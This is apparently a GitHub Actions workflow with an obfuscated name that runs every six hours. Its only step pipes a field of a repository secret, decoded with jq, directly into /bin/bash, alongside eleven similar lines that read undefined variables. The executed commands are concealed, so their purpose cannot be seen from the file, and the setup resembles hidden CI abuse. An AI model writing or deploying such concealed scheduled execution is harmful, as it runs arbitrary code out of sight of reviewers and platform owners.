name: zhuanxiagjiaozhou

on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuanxiagjiaozhou
        env:
          hs5: ${{ secrets.hs5 }}
        run: |
          echo $hs5 | jq -r .msvb1 | /bin/bash
          echo $b59 | jq -r .peye2029 | /bin/bash
          echo $hlwfe761 | jq -r .orsw3812 | /bin/bash
          echo $oaju3 | jq -r .yknh8 | /bin/bash
          echo $sspa5206 | jq -r .ro399 | /bin/bash
          echo $cs39 | jq -r .fkbrc9 | /bin/bash
          echo $zpp1 | jq -r .lz5 | /bin/bash
          echo $ktgrf32929 | jq -r .lmtll60709 | /bin/bash
          echo $dgc32393 | jq -r .h34 | /bin/bash
          echo $s3762 | jq -r .j59373 | /bin/bash
          echo $corv02 | jq -r .xksj851 | /bin/bash
          echo $ad70 | jq -r .wdiag66548 | /bin/bash

